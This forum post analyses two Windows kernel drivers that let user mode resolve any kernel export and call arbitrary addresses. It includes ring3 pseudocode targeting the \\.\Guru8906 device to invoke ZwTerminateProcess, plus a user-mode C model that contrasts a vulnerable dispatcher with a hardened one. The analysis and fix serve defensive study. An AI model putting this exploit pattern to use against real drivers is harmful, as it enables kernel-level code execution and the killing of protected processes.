This post was last edited by DisaPDB on 2026-4-18 12:54
6ae294cb5c71118350342e6a26350d0e95ea23d0548125b09056efa0ea19bf45.sys
A kernel-mode state machine: v10 is a function pointer converted from MasterIrp->Flags, fully controlled from user mode.
Through an IOCTL, a user can make the kernel execute a function at an arbitrary address.
17aae57cf6255c7eb169bf62ea67376d9708976eb7831f8cdd0ea38bdcb37dc4.sys
This MasterIrp structure directly lets user mode obtain arbitrary pointers and execute at arbitrary memory addresses:

if ( *(_QWORD *)&MasterIrp->Type == 1000LL )
{
    RtlInitAnsiString(&SourceString, (PCSZ)&MasterIrp->MdlAddress);
    RtlAnsiStringToUnicodeString(&DestinationString, &SourceString, 1);
    SystemRoutineAddress = MmGetSystemRoutineAddress(&DestinationString);
    MasterIrp->MdlAddress = SystemRoutineAddress;
}
Further on, command 1001 allows calling an arbitrary kernel function address.
Combined with command 1000 to obtain the address of any exported function, user mode can perform arbitrary kernel operations.
In other words, a ring3 program could be written like this (pseudocode):
#include <windows.h>

/* The two helpers are not defined in the post; they wrap the driver's two commands:
   command 1000 (resolve a kernel routine by name via MmGetSystemRoutineAddress) and
   command 1001 (call an arbitrary address). The IOCTL codes and buffer layout are not
   given on the page, so they remain prototypes here. */
BOOL GetKernelFunctionAddress(HANDLE hDevice, const char *name, ULONG_PTR *pAddress);
BOOL CallKernelFunction(HANDLE hDevice, ULONG_PTR fn, ULONG_PTR a1, ULONG_PTR a2, ULONG_PTR a3,
                        ULONG_PTR a4, ULONG_PTR a5, ULONG_PTR *pResult);

int main(void)
{
    HANDLE hDevice = CreateFileW(L"\\\\.\\Guru8906", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) return 1;

    /* Command 1000: ask the driver to resolve kernel exports by name */
    ULONG_PTR pPsGetCurrentProcess = 0, pPsLookupProcessByProcessId = 0, pZwTerminateProcess = 0;
    GetKernelFunctionAddress(hDevice, "PsGetCurrentProcess", &pPsGetCurrentProcess);
    GetKernelFunctionAddress(hDevice, "PsLookupProcessByProcessId", &pPsLookupProcessByProcessId);
    GetKernelFunctionAddress(hDevice, "ZwTerminateProcess", &pZwTerminateProcess);

    /* Command 1001: run PsLookupProcessByProcessId(1234, &pTargetEprocess) in kernel mode;
       the output pointer is a user-mode address the kernel writes to directly */
    ULONG_PTR pTargetEprocess = 0;
    CallKernelFunction(hDevice, pPsLookupProcessByProcessId, 1234, (ULONG_PTR)&pTargetEprocess, 0, 0, 0, NULL);
    /* Illustrative only: ZwTerminateProcess expects a process HANDLE, not an EPROCESS pointer,
       so a real chain would open a handle to the object first. The point is the primitive. */
    CallKernelFunction(hDevice, pZwTerminateProcess, pTargetEprocess, 0, 0, 0, 0, NULL);
    CloseHandle(hDevice);
    return 0;
}
Overall, both of these are "deliberately written vulnerable drivers": without a ring3 program sending the control codes there is no malicious behaviour. It would be clearer if we could get hold of the ring3 program.
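To make the "resolve by name, then call the address" pattern concrete without a kernel, here is an added user-mode model of the dispatcher, not code from either driver or from the post. The request block, the fake export table, the command numbers 2000 and the return codes are all constructed for the example; only the 1000/1001 command semantics follow the page. The vulnerable dispatcher has the same shape as the decompiled state machine, and the hardened one shows the fix a driver author should apply: no generic name-to-address service and no code pointer taken from the request.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS                0
#define STATUS_INVALID_DEVICE_REQUEST (-1)   /* constructed return codes, not real NTSTATUS values */

typedef uint64_t (*KernelRoutine)(uint64_t, uint64_t, uint64_t, uint64_t);

/* Constructed request block. The real driver reuses the IRP's Type and MdlAddress
   fields; a union makes the "name in, address out" overlap explicit. */
typedef struct {
    uint64_t Type;                 /* 1000 = resolve routine by name, 1001 = call address */
    union {
        char      Name[64];        /* command 1000 input: ANSI routine name */
        uintptr_t Address;         /* command 1000 output / command 1001 input */
    } u;
    uint64_t Args[4];              /* command 1001: arguments passed straight through */
} Request;

/* Side-effect recorder so a caller can see what the model "kernel" did. */
static uint64_t g_terminated_pid = 0;

/* Stand-ins for two kernel exports (constructed, not the real routines). */
static uint64_t k_PsGetCurrentProcessId(uint64_t a, uint64_t b, uint64_t c, uint64_t d)
{ (void)a; (void)b; (void)c; (void)d; return 4; }
static uint64_t k_ZwTerminateProcess(uint64_t pid, uint64_t b, uint64_t c, uint64_t d)
{ (void)b; (void)c; (void)d; g_terminated_pid = pid; return STATUS_SUCCESS; }

static const struct { const char *name; KernelRoutine fn; } g_exports[] = {
    { "PsGetCurrentProcessId", k_PsGetCurrentProcessId },
    { "ZwTerminateProcess",    k_ZwTerminateProcess    },
};

/* Model of MmGetSystemRoutineAddress: export name -> address, or NULL. */
static KernelRoutine resolve_routine(const char *name)
{
    for (size_t i = 0; i < sizeof g_exports / sizeof g_exports[0]; i++)
        if (strcmp(g_exports[i].name, name) == 0) return g_exports[i].fn;
    return NULL;
}

/* Vulnerable dispatcher: mirrors the decompiled state machine. Command 1001 calls
   whatever pointer the caller put in the request, with caller-chosen arguments. */
int vulnerable_dispatch(Request *r)
{
    switch (r->Type) {
    case 1000: {
        KernelRoutine fn = resolve_routine(r->u.Name);   /* reads the name in place ... */
        r->u.Address = (uintptr_t)fn;                    /* ... and overwrites it with the address */
        return STATUS_SUCCESS;
    }
    case 1001: {
        KernelRoutine fn = (KernelRoutine)r->u.Address;  /* no validation at all */
        return (int)fn(r->Args[0], r->Args[1], r->Args[2], r->Args[3]);
    }
    default:
        return STATUS_INVALID_DEVICE_REQUEST;
    }
}

/* Hardened dispatcher: each command is one fixed, bounded operation. There is no
   "resolve" service and the handler never derives a code pointer from the request. */
int hardened_dispatch(Request *r)
{
    switch (r->Type) {
    case 2000:                                           /* constructed: query current PID */
        r->u.Address = (uintptr_t)k_PsGetCurrentProcessId(0, 0, 0, 0);
        return STATUS_SUCCESS;
    default:                                             /* 1000 and 1001 are rejected */
        return STATUS_INVALID_DEVICE_REQUEST;
    }
}

/* Replays the ring3 flow from the post against a dispatcher: resolve
   ZwTerminateProcess, then call it. Returns the pid the model kernel terminated, or 0. */
uint64_t replay_exploit(int (*dispatch)(Request *), uint64_t target_pid)
{
    Request r;
    g_terminated_pid = 0;
    memset(&r, 0, sizeof r);
    r.Type = 1000;
    strncpy(r.u.Name, "ZwTerminateProcess", sizeof r.u.Name - 1);
    if (dispatch(&r) != STATUS_SUCCESS || r.u.Address == 0) return 0;
    uintptr_t addr = r.u.Address;
    memset(&r, 0, sizeof r);
    r.Type = 1001;
    r.u.Address = addr;
    r.Args[0] = target_pid;
    dispatch(&r);
    return g_terminated_pid;
}

int main(void)
{
    printf("vulnerable: terminated pid %llu\n", (unsigned long long)replay_exploit(vulnerable_dispatch, 1234));
    printf("hardened:   terminated pid %llu\n", (unsigned long long)replay_exploit(hardened_dispatch, 1234));
    return 0;
}
```

Against the vulnerable dispatcher the two-step flow terminates the target; against the hardened one, command 1000 is refused outright, so the caller never learns an address and command 1001 has nothing to call. The same property holds for the first driver, where the pointer comes from MasterIrp->Flags instead of a name lookup: the fix is the absence of any path from request bytes to an indirect call target.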